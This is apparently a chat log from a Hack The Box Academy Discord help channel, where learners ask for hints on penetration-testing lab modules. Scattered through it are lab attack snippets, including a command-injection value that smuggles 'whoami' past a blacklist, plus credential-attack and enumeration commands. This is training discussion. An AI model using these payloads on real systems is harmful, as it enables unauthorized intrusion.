#modules

1 messages · Page 79 of 1

fathom pendant
#

and you may be able to get it that way

golden vortex
#

Hello im working on attacking common services module in section attacking common services - easy. i have user and pass and im trying to upload a shell through mysql but im unable to can anyone help?

rustic arrow
#

Thanks, I specialize in Linux, so Windows hurts me, lol, but I am getting the hang of it

naive wadi
#

I'm having a weird one, doing the NMAP module and I'm enumerating services to find a flag but I can't seem go find it. I've tried manually scanning each port. Ive also been running tcpdump whilst also manually connecting via NC to each port to see if its been hidden in some weird header. Have I missed the point of the challenge?

#

Or am I to actually enumerate the services and find a vulnerability in the service itself?

rustic arrow
naive wadi
rustic arrow
green birch
#

ok, than I know this with LHOST, but why they told two and I see six required with yes?

thorn urchin
#

but LHOST for your payload callback and RHOST for the target youre running the exploit against still needs to be added

green birch
thorn urchin
#

if it says yes and is blank then definitely have to set something otherwise usually can ignore it.

that said its super exploit to exploit dependent and you should be fully understanding an exploit and what it does before running it.

At these early stages with controlled labs and still learning the basics its fine to be a little loose with this, but if you get to the point of doing some real world stuff youll absolutely need to be capable of that understanding.

golden vortex
#

Hello im working on attacking common services module in section attacking common services - easy. i have user and pass and im trying to upload a shell through mysql but im unable to can anyone help? when running curl i get the error "header without colon"

thorn urchin
rustic sage
#

Thank you for the help!

zinc sentinel
humble halo
#

I need help with the Osint Corporate Recon module with this specific question : What are the city's coordinates where one of the company's offices, "inlanefreight.com" has its headquarters in Germany? (format: 00.0000 N, 0.0000 E) I'm stuck because the coordinates I got from google dont work and I''m pretty out of options

rustic sage
#

hello am stack in Cracking Common Hashes, i think its a ntlm hash, i used a bunch of rules but i dont seem to get something

humble halo
autumn pilot
#

try changing your google region settings to the country from where oktorberfest originates

thorn urchin
#

I was also going to say are you sure you have the right city?

#

Cause the city I found seems to be different than the incorrect city people complain about in the forums.

#

but ive also not done that module so I cant confirm if my answer is correct

acoustic owl
#

Set the language of the browser to English

humble halo
#

I've set the browser in english and the country in germany and i got the same result here :

#

can't share the screenshot weid

thorn urchin
#

cause your account isnt verified

humble halo
#

i got this in fact : 51.0951° N, 10.2759° E

thorn urchin
#

not the city I found

humble halo
#

You didnt found Frankenroda ?

thorn urchin
#

nope

#

but caveat again, Ive not completed the module so idk if my answer is correct either

#

but the inlanefrieght blog has a fun little offices section

#

not sure where people are finding frankenroda from

humble halo
#

Ok you've got me to find it

#

The city frenkenroda is directly from google

#

and the other town you got me to try is on the site

#

so we got 2 options for the answers

#

Thanks a lot to all of you

fallow delta
#

Dumb question, but on the SMTP section of Attacking Services, I got the creds but need to log in. Anyone able for a nudge?

hollow finch
#

Anyone else have no internet access on the Live Engagement, Box 2? This is the one with the blog. I've searched high and low in Metasploit for the indicated exploit, without luck and so am assuming the path is to get the exploit into Metasploit...just not entirely sure how to effect that if the victim box has no internet connection. If anyone has a clue, I'd be grateful! 🙂

steady hawk
dull vortex
#

Can I dm someone about the easy footprinting lab? I have already completed the module, but I am going through and making a walkthrough for future reference and to reinforce the information, but now I believe that something is not working the way that it should be anymore.

limber widget
naive field
#

hey guys im on attacking common services and on mail section. im stuck at the beggining. i tried enumerating users with smtp-user-enum but i got nothing

#

🤷‍♂️

#

i used the provideded user list in resources

#

been stuck on this for some time, tried doing it alone but not working for now...

#

nvm... i found the user.... sorry

finite seal
#

Hello. Need help on the last question for Pass the Ticket (PtT) from Linux.

naive field
#

let me pull up my notes, sec

naive field
#

like what r u stuck at

finite seal
solid wedge
#

Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag. Can someone help I am stuck on this module.

naive field
#

what r u stuck on, u dont know how to fuzz with burp?

solid wedge
green birch
#

I make the Question from Public Exploits. Now the Metasploit said: Msf::OptionValidateError The following options failed to validate: RHOSTS.
I want to know if this error occurs perhaps because I was too slow and the IP:Port is no longer valid? Or does that means I have to use a different exploit?

golden vortex
#

Hello im working on attacking common services module in section attacking common services - easy. i have user and pass and im trying to upload a shell through mysql but im unable to can anyone help?

storm skiff
#

Hey guys, I'm trying to solve the command injection skills assessment. I found the parameter and I think I have the operator. I received ||Malicious request denied!|| from the server, but I'm stuck there

solid wedge
naive field
naive field
#

any of them should work

#

but if ots intented to teach u how to use burp then use burp ig

storm skiff
solid wedge
green birch
naive field
#

sorry

green birch
naive field
#

did you set rhosts?

#

rhosts = target

#

if you don't set rhosts you don't have the taget for the exploit

green birch
# naive field the error is RHOSTS?

I have put RHOSTS und LHOST. But now it said 178.128.46.49:443 - The target ist not exploitable. Connection failed. But I have tried also, that I put the Port 31513 from the target (Question) for RPORT and for LPORT, but in neither case did it work.

naive field
#

can you type show options and send a screenshot please

#

most of the time you are not needed to provide the port for the rhosts except if the service is on uncommon port

red current
#

Having an issue in the Query Results section of SQL Injection Fundamentals. I think I have my query formulated properly, but I'm getting a result of Empty set, 1 warning. My query is as follows > Select * FROM employees WHERE first_name like 'Bar%' AND hire_date = 1990-01-01;

green birch
naive field
#

is the rhosts your target ip?

green birch
#

I work with openvpn. Shell I change to the integrated spawns?

naive field
#

are you sure its the right exploit?

#

i dont have notes on this soo i dont know...

green birch
# naive field are you sure its the right exploit?

Sure? no. 🙂 With searchsploits I have found this. Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) (multiple/webapps/50383.sh)
But I didn't know how to put it in Metasploit Framework. But now I have an idea. I can copy this and can put it into Metasploit Framework.

edit: no, that didn't work. I have tried it with another exploit but this no works, too.

edit-2: I've forgotton to see into the Hint. That told me that I have to search for plugin exploits. --> I want to make it now.

fathom pendant
#

Is this the "Getting Started" module, Public Exploit?

#

If so: then you will need to navigate to the webpage via http://ip:port/

#

That will get you the info you actually need to exploit

winter sphinx
green birch
winter sphinx
#

Yeah I feel super dumb lmao

fathom pendant
#

Whenever you're given IP:PORT it's a docker container, meaning website

hollow finch
#

were you ever able to get this figured out? I haven't been able to get the exploit into metasploit for some reason

fathom pendant
#

It also doesn't follow the 10.x.x.x format of other targets in other modules

scarlet gyro
#

For the OSINT module, I do not see any other cities listed that could be headquarters for inlanefreight.com other than Oberhausen, Brighton, and Denver. When I put in the latitude and longitude in Decimal format that I find from Wikipedia (geohack.toolforge.org) for each of these cities the answer is incorrect. What am I missing?

red current
#

Has anyone here gotten past the Query Results section of SQL Injection Fundamentals? I could use some help with the query needed for this section. I'm not sure why mine is wrong.

naive field
#

im doing attacking common services email section and i've found the creds but i do not know where to use it to log in?

thorn urchin
#

well if its the email section have you tried logging into the email

naive field
#

yeah

#

but before i've used evolution but now its not working for some reason

#

so idk whatelse to use

thorn urchin
#

I just use netcat

naive field
thorn urchin
#

its just a text protocol, the section goes over it

naive field
#

no it doesn't 🤷‍♂️

thorn urchin
#

okay it uses telnet, same diff

#

manual is still intended route

naive field
#

yeah, but when i try to run command on telnet

#

i get this error

#

"503 Bad sequence of commands"

#

well u can re do them

thorn urchin
#

¯_(ツ)_/¯

frosty nacelle
#

Can anyone help with the File Upload Attacks -> Limited File Uploads module? I got the first question but having issues with the second question. The only thing I can do is read the content of /etc/passwd .

naive field
#

then i tried the same cmd with the user i have

#

always same thing

thorn urchin
#

why are you trying to vrfy root when your goal is to login

red current
#

Never mind. It helps to put ' around the information you're querying for.

thorn urchin
#

its a bit annoying cause the section doesnt actually tell you how to check mail manually or login manually, you gotta do some googling

#

one of the two services was easier to do by hand than the other but idr which one

naive field
#

but its not like working

#

so idk if i maybe got false positive with hydra or sm

#

for the password...

green birch
# fathom pendant That will get you the info you actually need to exploit

First I was able to browse the server on the target with the right exploit. But then I accidentally closed the terminal and now it only searches my own computer and no longer the target computer, even though I entered the correct IP under RHOSTS. Do you happen to know what I messed up here? Because I've been at it for a long time and have tried many things, but I always end up on my computer.

scarlet gyro
golden vortex
#

Can i dm somone about attacking commons ervices easy

#

ive been stuck for 10 hours

golden vortex
lunar hornet
#

Hello everyone, could someone help me solve the second question in the PHP Web Shells section please?

#

this is the question: Use what you learned from the module to gain a web shell. What is the file name of the gif in the /images/vendor directory on the target? (Format: ****.gif)

green birch
#

someone can give me a hint? I can't get any further with the exploit I found. I can't access the server with it. At least I can't. Now I read in the description of the exploit that the file can be downloaded directly from the website. I'm trying to use the exploit's instructions, but I'm always downloading a file that's empty.
Who can give me a tip please? I've been trying to answer this question for many, many hours now.

jaunty vigil
#

would love some help here... lol

#

javascript secure coding 101

scarlet gyro
quick crane
#

who can help me the skill assessment "For this level, you must successfully authenticate to the Domain Controller host at 172.16.5.155 via SSH after first authenticating to the target host. This host seems to have several PowerShell modules loaded, and this user's flag is hidden in one of them."

scarlet gyro
#

maybe: get-module xyz | get-command

#

or look for the places where modules are installed on disk

quick crane
#

no hava

quick crane
scarlet gyro
#

do you have to guess it?

quick crane
fathom pendant
fathom pendant
fathom pendant
quasi wave
#

hey is anyone available tomorrow at 3 to 4:30 PST to help me one on one with the Intro to Network Traffic Analysis module's Interrogating Network Traffic With Capture and Display Filters section

#

I need help sifting through a fuckton of TCPDump output

#

I do what the instructions say but there's just so much output here

#

to sift through to find what it wants me to find. I can do it but just need a little help narrowing down output. Here is command I normally use:

sudo tcpdump -Sr TCPDump-lab-2.pcap
#

That doesn't narrow it down enough for me I don't think

#

I tried researching it and I tried some stuff off stack overflow for someone who had a similar issue to just get TCP three-way handshakes but to no avail

#

DM me if you are available to help tomorrow

#

or actually, DM me if you are able to help any time between 2:30 and 5

#

thank you

solemn gull
#

Module : INTRODUCTION TO WINDOWS COMMAND LINE
Section : Skill Assessment
Question8 : For this level, you must successfully authenticate to the Domain Controller host at 172.16.5.155 via SSH after first authenticating to the target host. This host seems to have several PowerShell modules loaded, and this user's flag is hidden in one of them.

hi i have been lost 1 day, i have run the module Get-Flag and its said : the flag you are looing for is

i try find the module but im lost. can you advice me what to do?

fathom pendant
solemn gull
obsidian crescent
#

Module: Password Attacks - Pass the Ticket (PtT) from Linux - I am stuck on the last question.. The question is: Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).

I was able to retrieve the flag.txt from \DC01\linux01 but that flag doesn't start with Us1nG and its not accepting what I did find...

fathom pendant
#

Remove the flag from your post @solemn gull

fathom pendant
solemn gull
obsidian crescent
quasi wave
#

hi can anyone help me right now with this module?

fathom pendant
#

Cause it may be the issue I think it is

quasi wave
#

like I don't need to wait until tomorrow if someone can help me right now

fathom pendant
#

For the keytab

#

It's more of a cache

quasi wave
#

hi I need help with the Intro to Network Traffic Analysis module. Anyone able to help me tonight?

fathom pendant
#

Just be patient dude it's a Monday so most people are probably busy

obsidian crescent
jaunty vigil
#

did no one really do javascript secure coding...

fathom pendant
quasi wave
#

the next four sections after this one are on Wireshark

fathom pendant
#

Though I found it by stumbling around. Just think about the info you find from realm and that there must be a __d__aemon that runs it (so {service}d) @obsidian crescent

#

You will find your Linux info there :)

obsidian crescent
vital adder
fathom pendant
vital adder
#

i mean the it did show you the absolute tcp sequence numbers tag which have the right answer you just have to find it in 535 word all dumped without color

fathom pendant
#

Gross

spiral pelican
#

Hi all. I am trying to redo the AD enum attack skill 2. The first time I did it I rember getting the admin hash on the 7.60 host by launching lazagne as admin an reuse the hash in 7.50. But now I get a different hash and this one doesn't work on the first host. I can figure out why my output are different this timei I missing something? 😅

spiral pelican
#

😢

#

Can figure out what I missing this time. It makes me crazy 😅

spiral pelican
terse olive
#

Hello guys,
I have a show and i don't know what should i do, can you give me projects or idea for the show?.

lusty crag
#

Can you take your certification from hackthebox and use it in jobs?

vital adder
#

yeah this is a bit too much spoiler i would say

vital adder
terse olive
vital adder
#

maybe #general this channel is for the academy modules

woeful ermine
vital adder
#

i mean the process chain is spoiler of course the topic is showed in the section but reviewing what to do in each step here is a bit too spoiler (here)

#

hinting the path is completely ok in DM

spiral pelican
slender steppe
#

anyone have completed this Bypassing Blacklisted Commands

#

need help in this

#

ip=127.0.0.1%0aw'h'o'am'i this command is working fo me but how can i make call for user/home/flag.txt

slender steppe
#

yes but not working that

#

what cmd will be

fiery berry
#

try to check step by step which char is blacklisted and go from there

autumn pilot
#

check the cheatsheet, there you can find some useful commands to help you craft the end command

sacred ermine
#

anyone who completed File upload skills assessment??
seems I stuck there for a while

#

unable to read upload.php, have no Idea

languid gull
#

Hello I’m trying the module introduction to python 3

#

And I’m stuck in the question “the type of foo from question 1 is class set . What is the type of x_coordinate ?

#

Can anyone please help

neat trench
#

Passwords attack: PTH Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt.

Q: How can i find DC01\david , i -list shares from david user with his hash using cme and there is no DC01\david. evilwinrm> ls \dc01\david -> path not found

turbid tartan
#

file upload attacks/blacklist Filters i cant get the webshells to work. it wont execute the php and asp

sly verge
#

hii

spiral pelican
#

Hi. Some one is available for giving help in AD enum? I have a very strange issue and I don't want to write any spoil 🙂

sacred ermine
#

anyone who completed File upload skills assessment??
seems I stuck there for a while
unable to read upload.php, have no Idea
I was able to get the extension by wordlist and now idk how to read upload.php
anyone who can help me with it? and I do use 'ÿØÿà' to use payload, in return I get nothing if I check response the same code but converted to base64

vagrant gust
#

how would one find the community string

#

this is for the hard footprinting module

#

ik u need to do something with snmp but snmpwalk times out with the public string

vagrant gust
#

thanks

acoustic owl
sacred ermine
#

anyone who completed File upload skills assessment??
seems I stuck there for a while
unable to read upload.php, have no Idea
I was able to get the extension by wordlist and now idk how to read upload.php
anyone who can help me with it? and I do use 'ÿØÿà' to use payload, in return I get nothing if I check response the same code but converted to base64

also I cannot upload svg file, even if I delete those two line via inspecting the page

stiff nymph
#

Who Ping Me

vagrant gust
#

cant seem to log in to the mysql server on the hard footprinting lab

#

ive got the user and the password

#

it just outputs all the help options

#

nvm

#

got it

#

lol

blissful plank
#

Hope I can get a little help. I am sooo new and I'm stuck on the introduction module. I do not understand what I'm supposed to do when I am spawning and trying to find out the answer to the question. Can I get assistance on what I am to be doing?

blissful plank
#

literally nothing. I have no idea how to spawn or what i am to be looking for

#

I just started learning the basics on information technology and trying to get into cybersecurity

vagrant gust
#

getting this error for mysql ERROR 2002 (HY000): Can't connect to MySQL server on '10.129.125.31' (115)

bleak willow
#

Anyone has this error too? idk what to do with that FeelsBadMan

blissful plank
# smoky estuary sure what do you know so far

when I have the IP for the spawn. obviously i am connected to the same internet i'm assuming but when I'm an to be looking for the proof text am I suppose to be using the PowerShell to find something using basic commands?

smoky estuary
#

make sure its in the spawned enviroment

blissful plank
#

ok

#

wow, went way over my head. I may be slow at this but I'm and dedicated to learn it

#

thank you

smoky estuary
#

No worries man I'm going through the same pain as you so I know how you feel hope your journey goes well

blissful plank
#

thanks

quick crane
#

Who can help me solve this problem in the user where to look,question "Who can help me solve this problem in the user where to look"

rough flame
#

Module: Kerberos Attacks
Unconstrained Delegation - Users

Need help.

Successfully retrieved tgt from dc01, yet can't perform dcsync with impacket-secretsdump (after exporting KRB5CCNAME) = No output. Tried psexec, yet receive "Name or service not known".

Edit: Nvm, i figured it out. Needed to add additional flag to secretsdump

torpid zinc
#

hey, i have a difficult time in AD Enumeration & Attacks - Skills Assessment Part II q10, could someone give me a nudge?

dull vortex
#

Any ideas why my smtp-user-enum is not returning any results for the footprinting exercise? I have set -w 25 and have the correct target IP + file path and name list. Here is my command: "smtp-user-enum -M VRFY -U /opt/useful/SecLists/namelist.txt -t 10.129.163.85 -w 25". It is just continuosly running and not giving me any results.

flat minnow
#

Hi all, at the Password Attacks module, Credential Hunting in Linux section I try to ssh to the server with te credentials provided in the hint, but with no success. Am I missing something?

silk minnow
#

Module: ATTACKING COMMON APPLICATIONS

Section: Attacking GitLab

i have been enumerating users for the past few hours and i have not gotten any valid users.

i am currently using the xato-net-10-million-usernames list. i tried with multiple shorter wordlists from seclist but did not get anything.

livid pier
#

Anyone still need help?

limber widget
#

Im still stuck on Pass the Hash (PtH) - Windows Lateral Movement - last question lol

livid pier
#

which module?

limber widget
#

Seems like im following the steps correctly but when I try to use invoke wmiexec - nothing happens, Not even an error

livid pier
#

alright give me a second to boot it up, I dont have notes

limber widget
#

no problem

flat minnow
livid pier
limber widget
livid pier
#

I used that but i didnt use it for the shell

limber widget
#

Shouldn't I get an error at least?

livid pier
limber widget
# livid pier

Ive gotta be doing something so stupid for it to not verbose anything

livid pier
#

for you i think its the .\

limber widget
#

When I dont use the .\ it gives error that the term cant be found

acoustic owl
livid pier
#

Import-Module .\Invoke-TheHash.psd1

#

then
Invoke-SMBExec -Target 172.16.1.10 ......

limber widget
#

this whole time I just needed 1 letter

livid pier
#

🎉

limber widget
#

So my brain can understand, can you or anyone explain the difference between those two files? they are the same name but one is ps1 and the other is psd1?

limber widget
flat minnow
livid pier
flat minnow
#

the last couple of hours I am trying to brute force my way in as the creds are not working, with the lists of usernames and passwords provided in the resources

livid pier
glossy ore
#

i think i'm being dumb, but i'm having issues parsing this question in the "dns enumeration with python" module: submit the one unique record in double quotes as the answer.
does this mean that the -answer- should be in double quotes? or that the -record- is in double quotes? and is it looking for the type of record, the value of the record, or the full dig/nslookup output for the record?

acoustic owl
glossy ore
#

ok got it finally. was just very confused by what it was looking for

livid pier
#

first they give you a password list and a set of rules, but the hint can allow you to focus on some passwords

#

using that, create a mutated password list

flat minnow
#

ohh.. ok thanks, that was unnecessarily misleading

mystic perch
#

Has anyone finished the shells and payloads module?

rustic sage
lunar hornet
#

Hello everyone, could someone help me solve the second question in the PHP Web Shells section please?

rustic sage
#

#Module: Attacking Common Services
#Sections: Attacking SQL Databases

Once the mssqlsvc password found, you can connect on the db using domain authent with the following mssqlclient.py command :

||mssqlclient.py -p 1433 WIN-02/mssqlsvc@10.129.33.61 -windows-auth||

Thanks

#

hi i can't use daily free pwnbox. when i started it see this error:

Error!
You have used your allowed pwnbox time

autumn pilot
#

"You have used your allowed pwnbox time"

rustic sage
#

nah dude i haven't even been on htb for a week

naive field
#

he guys im still stuck on attacking email on attacking common services

#

i got the creds but can't log in :DD

rustic sage
naive field
#

i tried via evolution, it didn't work

#

i tried telnet, no

rustic sage
#

my f**kingh htb openvpn does't worked in windows so i cant do machines

autumn pilot
rustic sage
#

when it rains it pours

naive field
rustic sage
#

does anyone can use htb openvpn on windows?

fathom pendant
#

Probably not. Since it makes more sense to use the VPN in a VM that you're attacking with

#

And can cause problems

naive field
#

but i wouldn't recommend tbh

#

he just does that cuz he is lazy to install inux

#

linux

trail leaf
#

Need a nudge on Broken Authentication - Brute Forcing Passwords, I'm definitely missing something obvious but can't put my finger on what

rustic sage
rustic sage
fathom pendant
#

that works too ¯_(ツ)_/¯

rustic sage
#

Do anyone know of any award-winning online ctf competitions? xD

fathom pendant
#

No

rustic sage
#

i've earned good money for ctf competitions but now days they are not dont do it

fathom pendant
#

This is not the channel anyway for that discussion: see #rules and #welcome

naive field
#

false positive

#

creds

#

stuck on this for like a day lmao

#

annoying af

fathom pendant
naive field
#

the creds

#

i just cant log in

#

or don't know how to i

#

ig

fathom pendant
#

Are you using user@email@ip?

#

:)

naive field
#

i tried using telnet

#

AUTH LOGIN

#

and then using the creds but it is not working

fathom pendant
naive field
fathom pendant
#

Isn't there pop3s or IMAPs running?

#

It's been a moment since I did the email ome

#

One*

naive field
#

i've been trying smtp only

fathom pendant
jagged sandal
#

guys i have a question

naive field
jagged sandal
#

witch version of parrot is better?
security audition OR Hack The Box Edition ???

fathom pendant
fathom pendant
naive field
jagged sandal
fathom pendant
#

¯_(ツ)_/¯

#

HTB edition just gives you some HTB background images

#

Similar images to what's on the pwnbox

jagged sandal
#

ok i got it

#

thanks

jagged sandal
fathom pendant
alpine dome
#

I think that there are some parts of Academy modules that should be improved/changed. Someone should consider putting a separate feedback form where we could suggest corrections.

fathom pendant
naive wadi
#

I am doing the Firewall and IDS/IPS Evasion Medium Lab and the wording of the hint is confusing.

fathom pendant
#

What's the wording?

naive wadi
#

"During the meeting, the administrators talked about the host we tested as a publicly accessible server that was not mentioned before."

fathom pendant
#

Ah

naive wadi
#

Okay that implies that the host that I am looking for is not the IP I have been given?

fathom pendant
#

Just do your normal enumeration

naive wadi
#

And there are other machines on the subnet

fathom pendant
#

It is not implying that

#

It is stating that there may be a service running that needs to be publicly accessible

#

Just enumerate the host

naive wadi
#

Ahhh, okay. Not to clear from that wording but thanks for clearing that up.

fathom pendant
#

And work from that

#

All the info you need to solve it is in the module

naive wadi
#

I get that, but if the wording isn't clear I could be trying to enumerate the wrong machine......

fathom pendant
#

The wording is pushing you towards DNS

#

Hint: you may not get it with TCP

trail leaf
#

need some nudges/help with a few things on Broken Authentication in the dms

humble halo
#

Module : Osint Corporate Recon
Question : What is the hosting provider for the inlanefreight.com domain?
I tried Shodan and got : DigitalOcean, LLC. Tried multiple way to write it without results

Anyone can point me toward the answer please ?

river token
#

Password Attacks - Lab Hard - Is there any easy way to mount a drive ?

#

I have it, I just cant mount it

acoustic owl
# river token I have it, I just cant mount it
Linux Uprising Blog

This is a guide on how to access a BitLocker-encrypted Windows volume from Linux, useful in cases of dual-booting Windows 10, 8 or 7, and a Linux distribution. It covers how to decrypt and mount the BitLocker partition from the command line, as well as how to add it to /etc/fstab, so it's automatically mounted on boot.

river token
humble halo
#

@acoustic owl I'm try that right away, thanks a lot !

humble halo
fallow delta
#

yeah I'm kinda stuck on that

lusty crag
lament lance
#

Can someone please help me with Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer.?

#

nmap module

lament lance
#

I also tried aggressive scan

thorn urchin
#

the sections mention a bunch of other categories to try

lament lance
#

ok i got an idea

river token
#

password attacks - lab hard - i've got a couple files from a mounted HD, but not sure what to do with them. Any hints ?

thorn urchin
#

well, what are the files youve gathered

river token
#

one is a file marked sam and on is a file marked system

lament lance
thorn urchin
river token
#

thanks for the hint - hopefully this will wrap it up for me 🙂

river token
mystic perch
#

i got error Exploit failed: NoMethodError undefined method `split' for nil:NilClass Shells and payloads skills assesment. can u help me ?

thorn urchin
#

thats not really a question

#

what are you trying and why

mystic perch
#

If anyone has finished this module, it will already help. I didn't want to give spoilers

thorn urchin
#

Good luck then

green birch
#

I'm currently editing Hacking into HTB - Getting Started. It is often the case that I cannot run commands such as nmap, gobuster with the target IP. Then I get the message that I can't get a connection. Is that what HTB wants or what can be the reason? Because of course I would also like to try out a few commands that are explained in the module or in the previous modules. So I can practice and see how things work. Hence my question.

brave sail
manic magnet
#

I am currently stuck at the Active Directory Enumeration Module at the ACL enum section, last question. What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word) I tried the commands and they don't give me result even after waiting ages. I tried writing my own commands in powershell all also not working. Tried Bloodhound but can not find the ObjectAceType in it. I see the edges in Bloodhound but idk how to get to the right info. Can someone help me with it ?

thorn urchin
#

the command ran does indeed take a long time to run

manic magnet
thorn urchin
#

yeah try like 20ish

manic magnet
steady hawk
#

A lot easier with BH. Select your user > info > Outbound Control Rights

brave sail
#

What is the method to escalate privileges with a shell with root busctl permissions? gtfobins seems to list an enummeration command.

fathom pendant
#

Did you actually try the command? What module is this for?

thorn urchin
#

at the time I did that section bloodbound wasnt able to solve that question

brave sail
#

It's for Linux Local Privilege Escalation

manic magnet
brave sail
#

I can't seem to understand the command, i thought it lists communaction between services.

#

communication*

fathom pendant
hollow finch
#

Hey All, working on Host-02 in the Live Engagement, Shells and Payloads module. In running the exploit with all settings correct, I'm getting an error message "Exploit failed: NoMethodError undefined method `get_cookies' for nil:NilClass" - if anyone can help that would be awesome 🙂

fathom pendant
#

Make sure you set all options for the msf module

#

That are required

hollow finch
#

@fathom pendant was that for moi? 🙂 If so I'm setting all the ones required, including VHOST...perhaps I have the wrong payload set?

manic magnet
thorn urchin
#

sounds right to me

fathom pendant
hollow finch
#

ah ok, i've tried it over and over, oddly there is no LHOST listed as an option from what I'm seeing

fathom pendant
#

Oh yeah I'm thinking diff module RHOST, VHOST, I think maybe one other option

hollow finch
#

@fathom pendant DM'd you a screenshot of what I'm seeing

fathom pendant
#

i haven't done it in a minute and not at my computer to sanity check ¯_(ツ)_/¯

hollow finch
#

no hurry 🙂 I've been at this for three days already haha

fathom pendant
#

grep '+' you may need to escape and do grep '+'

fallow delta
#

Anyone available for a nudge on Attacking Common Services - Easy? I'm on the last part, just need an assist with syntax

hollow finch
#

@fathom pendant well, I finally got it by changing the RPORT 🙄

green birch
turbid hull
fathom pendant
golden vortex
#

Attacking Common Services - Hard module

Can anyone help me please? I'm stuck .I found user F** and credentials to RDP.. tried to connect to MSSQL with it but im unable. are their other credientals or something?

green birch
fathom pendant
#

No target is not the same as pwnbox

#

Target is the "spawn target" button

fathom pendant
green birch
fathom pendant
#

it could also be that you don't have the same wordlist location from the example ¯_(ツ)_/¯

#

Like Seclist

#

If the target does not have an open webport then gobuster may not return anything

green birch
#

Por example, I have the question from the module Public Exploit. I have an target and I will tried some commands which I have learned in the modul. But with netcat, gobuster, for example, I don’t have a connection.

green birch
#

But only a few commands have a connection. So, I don’t can try other commands.

fathom pendant
#

Ah that requires the port as well with gobuster http://IP:port, with nmap you probably won't get anything as it's a docker container

#

The reason for nmap not working is to force you to think outside the box

golden vortex
#

@fathom pendant can i DM you?

fathom pendant
golden vortex
fathom pendant
#

Look around at what you can do in MSSQL

flint sparrow
#

anyone

alpine dome
quasi wave
#

quick question: without telling my secrets of HTB Academy's upcoming modules, has anyone thought of creating a path that works with other vendors besides CREST such as SANS or OffSec?

#

if there was a pathway for OSWE for example that would be gold

#

has that been actively considered?

quasi wave
#

I'm not saying its a big deal if they don't but it would be really great

#

I'm not complaining either way tho HTB Academy is so awesome its not even funny.

proud pine
#

offsec is a direct competitor, so that's not going to happen

west stump
#

Does anyone know if windows in case sensitive?

fathom pendant
#

For most things, windows is not case sensitive

vagrant gust
#

i need a final hint for the hard footprinting lab

#

ive got into ssh and found the bash history

#

and know its got something to do with mysql but the ports are closed

fathom pendant
#

You can access MySQL internally

vagrant gust
#

with a private key?

fathom pendant
#

... with the user you're ssh as

#

You can access MySQL via them

vagrant gust
#

im so lost

fathom pendant
vagrant gust
#

what command would i use

fringe shell
#

I didnt have to specify a port

#

just user and pass

fathom pendant
vagrant gust
#

yeah

fathom pendant
#

And saw the history of how user accessed

#

So just... Do that

vagrant gust
#

😂

#

will do

fathom pendant
#

:)

vagrant gust
#

brains becoming mush

#

overlooking simple things

fathom pendant
#

Like... It's hard to really explain it any simpler xD

#

Get rest and crack more tomorrow lol

vagrant gust
#

the worst thing about this is

#

ive done most of the leg work

#

but i just failed at the easiest bit

fathom pendant
#

That's why I say it's def time to take a break lol

vagrant gust
#

finally finished it

#

thanks @fathom pendant

frigid hamlet
#

has anyone done bash scripting

thorn cosmos
brittle berry
#

Anyone able to give me a nudge on File Inclusion module - Skills assessment? I found LFI and I can view and poison the application log file. Poison is successful until I decide to poison with php code. Poisoning with php code "breaks" the poisoning and you can no longer poison the log, which means that there must be some filter that stops me. Where i'm stuck is that I cannot find a proper way to pass the shell and bypassing the filter.

acoustic owl
brittle berry
brittle berry
hoary palm
#

Hi guys, can you help me for the WordPress hacking assessment ? I'm stuck on the last question.

acoustic owl
thorn cosmos
#

list more

empty fog
#

Hello, I'm currently on the "WINDOWS PRIVILEGE ESCALATION" module and the "Interacting with Users" section. I'm struggling with the question "Using the techniques in this section, how can I obtain the cleartext credentials for the SCCM_SVC user?". I edited @Inventory.scf to paste my IP address, but I'm not getting a response in Responder. I'm only receiving the hash from myself and not from the SCCM_SVC user. The note states, "In our example, wait 2-5 minutes for the 'user' to browse the share after starting Responder," but I have already been waiting for 5+ minutes. Please, what I'm doing wrong?

fringe shell
empty fog
fringe shell
#

Is this to answer the question?

#

oh yeah, it is... have you tried procmon? It's been a while since I did this question, but it might be that you have to use one of the other techniques in the section

empty fog
gray saddle
#

Anyone else having issues starting boxes?

paper crag
#

Did you resolve this? I'm having the same problem...

acoustic owl
paper crag
rustic sage
#

Hi everyone, I'm having trouble with the second question of the Windows Privilege Escalation Skills Assessment - Part I. I'm in but I can't elevate privileges, can someone help me please?

quick crane
#

Why I am write "||authorization functions||" is errorn in "Active Directory provides authentication and <____> within a Windows domain environment."

autumn pilot
#

it expects only one word

quick crane
autumn pilot
#

Does someone knows what is the expected format of the answer in Error-Based SQL Injection section of the Advanced SQL Injections module

dull vortex
#

I am on the file transfers module, in the windows methods section and the first question is confusing me with what exactly I am supposed to do: "Download the file flag.txt from the web root using wget from the Pwnbox." If someone can nudge me in the right direction, it would be greatly appreciated. I don't understand where the file is, in regards to the web root, or the pwnbox. Do I need to use the pwnbox or can I use my VM? And do I need to host a server first somewhere? I am probably overcomplicating this but I am not sure where to go.

broken warren
#

A bit of a noodle question but is there a more compact/ faster way of adding hosts to my /etc/host file? Im working on Attacking common applications module, and they give us a list of Vhosts. I just took the IP and the list and added them all to my /etc/host file, which works. But it looks trashy.

heady tusk
zinc sentinel
#

Pivoting, Tunneling, and Port Forwarding complete 🥳
best module so far

green birch
raven saddle
#

Hello, I'm having a little trouble on the Dancing module. For some reason I can't connect to the SMB I think. It keep saying "tree connect failed: NT_STATUS_BAD_NETWORK_NAME" Any ideas as to what's going on?

plain coral
naive wadi
#

Looking for a nudge on the hard NMAP AV/Evasion lab. Have tried multiple scan attempts; -sU, -sA, nb* & smb* scripts e.g.

  • nmap <ip> -p <port> -sU -sV --script nbstat.nse -Pn -n

  • nmap <ip> -p <port> -sU -Pn --reason -D RND:4 --packet-trace --disable-arp-ping

    Have also been monitoring via TCPDUMP & connecting with NC

winged zodiac
#

Can I DM ?

zinc sentinel
plain coral
gentle root
plain coral
supple patio
#

did you check out every zone?

#

that's why i am asking

#

xd

#

there are several zones+_+

dim hound
supple patio
#

dig axfr internal.inlanefreight.htb @<IP>
for instance

#

try all of them

#

you'll find

supple patio
dim hound
#

Hahaha 🙂 in my opinion, watch dogs 1 and 2 are the best games ever made 😆

#

Watch dogs legion.. is really bad

supple patio
dim hound
#

Don’t 😅 waste of money hhah

supple patio
